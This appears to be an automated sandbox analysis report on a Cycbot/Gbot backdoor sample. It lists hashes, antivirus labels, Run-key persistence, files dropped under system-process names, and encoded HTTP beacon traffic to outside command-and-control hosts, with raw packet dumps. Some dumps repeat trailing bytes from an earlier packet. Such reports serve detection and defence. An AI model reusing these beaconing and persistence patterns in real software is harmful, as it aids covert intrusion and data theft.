Analysis Date2015-01-17 13:44:56
MD5d78c09af1678ad69243219eb6c25f20c
SHA12a855ff94ff638c5b6eadc123cd58d6704961dd7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 9a6facd71eb6ecddb34839d8cc903ebd sha1: 27b60608414534e73b4e46b022e9ca50a39209b3 size: 123904
Section.rdata md5: 0b1f6ed9b2449b87bf2c7c0de6854a49 sha1: c81a6ce3c7baf896020037b11a481044910106de size: 2048
Section.data md5: 298df70f95ef6e5a85badf3fe48e2d78 sha1: ffa5a790fb448a2727fab8b463626e2f09e66bd5 size: 46592
Section.rsr md5: 4b152409c15fb78d12a3dc3b61678964 sha1: 147f55247ab0b94f5a73e19244387769e9b3621c size: 512
Timestamp2005-10-06 00:35:21
VersionPrivateBuild: 1303
PEhash9b6803bbd5ba0d8fe3105f21fbf6ad78403ef267
IMPhash722d2a465f78c47b1f9d04c1cefc1d97
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Gbot.A!generic
AVCAT (quickheal)Trojan.Pakes.gen
AVClamAVTrojan.Gbot-303
AVDr. WebTrojan.Packed.21411
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Cycbot.AD
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureTrojan-Downloader:W32/Agent.DQLH
AVGrisoft (avg)Cryptic.BZJ
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.qr
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingTrojan.Win32.Generic.1271F17C
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSzoneij.com
Winsock DNSzonedg.com
Winsock DNSwww.internetsecure.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSwww.internetsecure.com
Type: A
198.203.191.132
DNSzonedg.com
Type: A
141.8.225.80
DNSzonetf.com
Type: A
141.8.225.80
DNSzoneij.com
Type: A
HTTP GEThttp://www.internetsecure.com/images/ismerch.gif?tq=gP4aKydkN7mwdry2VjnHQmF2n0gXto0Hch5tOg3%2FxxcH1OMnHA4aDHy%2Bl8%2FPB1u21ppCbUK1DdwCg3RVBFRUDBUkFeRwdspmJ92BpGmOrHKpGvqIr6c84cUzwi%2BAoXKfCkIzf80TR3TFP9%2FJtm%2BaLfawMQtJK88pHoGgn%2FcLd1ydkr3fvSi2iUNlCvHSqjlNBPYOoXF%2B4IQ6r%2F6TZHuZnBWZ7JzkyWtSWinHKLX1I6ViOCysTLKKAvdUdkaGJc9BvpbS1l732Rofz8EyFmfRXmJfRJkAX89g0sc4RrZMrWy5E1btYiV3SuCBAA4aF%2FU5NyQ%2FGmY9OQa2n0dmyGTDbOxCRR%2Bd5tqUjFiy9ehRGJJgGDyk9ZC9ZP%2BrrDfQcOp3cr4WcbcQ9Hm%2BIoDvfkJtz5QD4
User-Agent: iamx/3.11
HTTP GEThttp://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcq1%2BjbwvgS917W65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcq1%2BjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNwlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNzVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 198.203.191.132:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1041 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 69736d65   GET /images/isme
0x00000010 (00016)   7263682e 6769663f 74713d67 5034614b   rch.gif?tq=gP4aK
0x00000020 (00032)   79646b4e 376d7764 72793256 6a6e4851   ydkN7mwdry2VjnHQ
0x00000030 (00048)   6d46326e 30675874 6f304863 6835744f   mF2n0gXto0Hch5tO
0x00000040 (00064)   67332532 46787863 48314f4d 6e484134   g3%2FxxcH1OMnHA4
0x00000050 (00080)   61444879 2532426c 38253246 50423175   aDHy%2Bl8%2FPB1u
0x00000060 (00096)   32317070 4362554b 31446477 43673352   21ppCbUK1DdwCg3R
0x00000070 (00112)   56424652 55444255 6b466552 77647370   VBFRUDBUkFeRwdsp
0x00000080 (00128)   6d4a3932 4270476d 4f72484b 70477671   mJ92BpGmOrHKpGvq
0x00000090 (00144)   49723663 38346355 7a776925 3242416f   Ir6c84cUzwi%2BAo
0x000000a0 (00160)   584b6643 6b497a66 38305452 33544650   XKfCkIzf80TR3TFP
0x000000b0 (00176)   39253246 4a746d25 3242614c 6661774d   9%2FJtm%2BaLfawM
0x000000c0 (00192)   51744a4b 38387048 6f47676e 25324663   QtJK88pHoGgn%2Fc
0x000000d0 (00208)   4c643179 646b7233 66765369 3269554e   Ld1ydkr3fvSi2iUN
0x000000e0 (00224)   6c437648 53716a6c 4e425059 4f6f5846   lCvHSqjlNBPYOoXF
0x000000f0 (00240)   25324234 49513672 25324636 545a4875   %2B4IQ6r%2F6TZHu
0x00000100 (00256)   5a6e4257 5a374a7a 6b795774 5357696e   ZnBWZ7JzkyWtSWin
0x00000110 (00272)   484b4c58 31493656 694f4379 73544c4b   HKLX1I6ViOCysTLK
0x00000120 (00288)   4b417664 55646b61 474a6339 42767062   KAvdUdkaGJc9Bvpb
0x00000130 (00304)   53316c37 3332526f 667a3845 79466d66   S1l732Rofz8EyFmf
0x00000140 (00320)   52586d4a 66524a6b 41583839 67307363   RXmJfRJkAX89g0sc
0x00000150 (00336)   3452725a 4d725779 35453162 74596956   4RrZMrWy5E1btYiV
0x00000160 (00352)   33537543 42414134 61462532 4655354e   3SuCBAA4aF%2FU5N
0x00000170 (00368)   79512532 46476d59 394f5161 326e3064   yQ%2FGmY9OQa2n0d
0x00000180 (00384)   6d794754 44624f78 43525225 32426435   myGTDbOxCRR%2Bd5
0x00000190 (00400)   7471556a 46697939 65685247 4a4a6747   tqUjFiy9ehRGJJgG
0x000001a0 (00416)   44796b39 5a43395a 50253242 72724466   Dyk9ZC9ZP%2BrrDf
0x000001b0 (00432)   51634f70 33637234 57636263 5139486d   QcOp3cr4WcbcQ9Hm
0x000001c0 (00448)   25324249 6f447666 6b4a747a 35514434   %2BIoDvfkJtz5QD4
0x000001d0 (00464)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001e0 (00480)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x000001f0 (00496)   73743a20 7777772e 696e7465 726e6574   st: www.internet
0x00000200 (00512)   73656375 72652e63 6f6d0d0a 41636365   secure.com..Acce
0x00000210 (00528)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000220 (00544)   656e743a 2069616d 782f332e 31310d0a   ent: iamx/3.11..
0x00000230 (00560)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427663 71312532 426a6277 76675339   fBvcq1%2BjbwvgS9
0x00000040 (00064)   31375736 35724a71 6c4c6667 50695757   17W65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a207a 6f6e6564 672e636f   .Host: zonedg.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x000000a0 (00160)   2f332e31 310d0a0d 0a305452 33544650   /3.11....0TR3TFP
0x000000b0 (00176)   39253246 4a746d25 3242614c 6661774d   9%2FJtm%2BaLfawM
0x000000c0 (00192)   51744a4b 38387048 6f47676e 25324663   QtJK88pHoGgn%2Fc
0x000000d0 (00208)   4c643179 646b7233 66765369 3269554e   Ld1ydkr3fvSi2iUN
0x000000e0 (00224)   6c437648 53716a6c 4e425059 4f6f5846   lCvHSqjlNBPYOoXF
0x000000f0 (00240)   25324234 49513672 25324636 545a4875   %2B4IQ6r%2F6TZHu
0x00000100 (00256)   5a6e4257 5a374a7a 6b795774 5357696e   ZnBWZ7JzkyWtSWin
0x00000110 (00272)   484b4c58 31493656 694f4379 73544c4b   HKLX1I6ViOCysTLK
0x00000120 (00288)   4b417664 55646b61 474a6339 42767062   KAvdUdkaGJc9Bvpb
0x00000130 (00304)   53316c37 3332526f 667a3845 79466d66   S1l732Rofz8EyFmf
0x00000140 (00320)   52586d4a 66524a6b 41583839 67307363   RXmJfRJkAX89g0sc
0x00000150 (00336)   3452725a 4d725779 35453162 74596956   4RrZMrWy5E1btYiV
0x00000160 (00352)   33537543 42414134 61462532 4655354e   3SuCBAA4aF%2FU5N
0x00000170 (00368)   79512532 46476d59 394f5161 326e3064   yQ%2FGmY9OQa2n0d
0x00000180 (00384)   6d794754 44624f78 43525225 32426435   myGTDbOxCRR%2Bd5
0x00000190 (00400)   7471556a 46697939 65685247 4a4a6747   tqUjFiy9ehRGJJgG
0x000001a0 (00416)   44796b39 5a43395a 50253242 72724466   Dyk9ZC9ZP%2BrrDf
0x000001b0 (00432)   51634f70 33637234 57636263 5139486d   QcOp3cr4WcbcQ9Hm
0x000001c0 (00448)   25324249 6f447666 6b4a747a 35514434   %2BIoDvfkJtz5QD4
0x000001d0 (00464)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001e0 (00480)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x000001f0 (00496)   73743a20 7777772e 696e7465 726e6574   st: www.internet
0x00000200 (00512)   73656375 72652e63 6f6d0d0a 41636365   secure.com..Acce
0x00000210 (00528)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000220 (00544)   656e743a 2069616d 782f332e 31310d0a   ent: iamx/3.11..
0x00000230 (00560)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a5a 4d725779 35453162 74596956   ...ZMrWy5E1btYiV
0x00000160 (00352)   33537543 42414134 61462532 4655354e   3SuCBAA4aF%2FU5N
0x00000170 (00368)   79512532 46476d59 394f5161 326e3064   yQ%2FGmY9OQa2n0d
0x00000180 (00384)   6d794754 44624f78 43525225 32426435   myGTDbOxCRR%2Bd5
0x00000190 (00400)   7471556a 46697939 65685247 4a4a6747   tqUjFiy9ehRGJJgG
0x000001a0 (00416)   44796b39 5a43395a 50253242 72724466   Dyk9ZC9ZP%2BrrDf
0x000001b0 (00432)   51634f70 33637234 57636263 5139486d   QcOp3cr4WcbcQ9Hm
0x000001c0 (00448)   25324249 6f447666 6b4a747a 35514434   %2BIoDvfkJtz5QD4
0x000001d0 (00464)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001e0 (00480)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x000001f0 (00496)   73743a20 7777772e 696e7465 726e6574   st: www.internet
0x00000200 (00512)   73656375 72652e63 6f6d0d0a 41636365   secure.com..Acce
0x00000210 (00528)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000220 (00544)   656e743a 2069616d 782f332e 31310d0a   ent: iamx/3.11..
0x00000230 (00560)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a73650d   on: close....se.
0x00000150 (00336)   0a0d0a5a 4d725779 35453162 74596956   ...ZMrWy5E1btYiV
0x00000160 (00352)   33537543 42414134 61462532 4655354e   3SuCBAA4aF%2FU5N
0x00000170 (00368)   79512532 46476d59 394f5161 326e3064   yQ%2FGmY9OQa2n0d
0x00000180 (00384)   6d794754 44624f78 43525225 32426435   myGTDbOxCRR%2Bd5
0x00000190 (00400)   7471556a 46697939 65685247 4a4a6747   tqUjFiy9ehRGJJgG
0x000001a0 (00416)   44796b39 5a43395a 50253242 72724466   Dyk9ZC9ZP%2BrrDf
0x000001b0 (00432)   51634f70 33637234 57636263 5139486d   QcOp3cr4WcbcQ9Hm
0x000001c0 (00448)   25324249 6f447666 6b4a747a 35514434   %2BIoDvfkJtz5QD4
0x000001d0 (00464)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001e0 (00480)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x000001f0 (00496)   73743a20 7777772e 696e7465 726e6574   st: www.internet
0x00000200 (00512)   73656375 72652e63 6f6d0d0a 41636365   secure.com..Acce
0x00000210 (00528)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000220 (00544)   656e743a 2069616d 782f332e 31310d0a   ent: iamx/3.11..
0x00000230 (00560)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427663 71312532 426a6277 76675339   fBvcq1%2BjbwvgS9
0x00000040 (00064)   31375636 35724a71 6c4c6667 50695757   17V65rJqlLfgPiWW
0x00000050 (00080)   31636720 48545450 2f312e30 0d0a436f   1cg HTTP/1.0..Co
0x00000060 (00096)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000070 (00112)   0a486f73 743a207a 6f6e6564 672e636f   .Host: zonedg.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x000000a0 (00160)   2f332e31 310d0a0d 0a4f704c 6a527141   /3.11....OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a73650d   on: close....se.
0x00000150 (00336)   0a0d0a5a 4d725779 35453162 74596956   ...ZMrWy5E1btYiV
0x00000160 (00352)   33537543 42414134 61462532 4655354e   3SuCBAA4aF%2FU5N
0x00000170 (00368)   79512532 46476d59 394f5161 326e3064   yQ%2FGmY9OQa2n0d
0x00000180 (00384)   6d794754 44624f78 43525225 32426435   myGTDbOxCRR%2Bd5
0x00000190 (00400)   7471556a 46697939 65685247 4a4a6747   tqUjFiy9ehRGJJgG
0x000001a0 (00416)   44796b39 5a43395a 50253242 72724466   Dyk9ZC9ZP%2BrrDf
0x000001b0 (00432)   51634f70 33637234 57636263 5139486d   QcOp3cr4WcbcQ9Hm
0x000001c0 (00448)   25324249 6f447666 6b4a747a 35514434   %2BIoDvfkJtz5QD4
0x000001d0 (00464)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001e0 (00480)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x000001f0 (00496)   73743a20 7777772e 696e7465 726e6574   st: www.internet
0x00000200 (00512)   73656375 72652e63 6f6d0d0a 41636365   secure.com..Acce
0x00000210 (00528)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000220 (00544)   656e743a 2069616d 782f332e 31310d0a   ent: iamx/3.11..
0x00000230 (00560)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a5a 4d725779 35453162 74596956   ...ZMrWy5E1btYiV
0x00000160 (00352)   33537543 42414134 61462532 4655354e   3SuCBAA4aF%2FU5N
0x00000170 (00368)   79512532 46476d59 394f5161 326e3064   yQ%2FGmY9OQa2n0d
0x00000180 (00384)   6d794754 44624f78 43525225 32426435   myGTDbOxCRR%2Bd5
0x00000190 (00400)   7471556a 46697939 65685247 4a4a6747   tqUjFiy9ehRGJJgG
0x000001a0 (00416)   44796b39 5a43395a 50253242 72724466   Dyk9ZC9ZP%2BrrDf
0x000001b0 (00432)   51634f70 33637234 57636263 5139486d   QcOp3cr4WcbcQ9Hm
0x000001c0 (00448)   25324249 6f447666 6b4a747a 35514434   %2BIoDvfkJtz5QD4
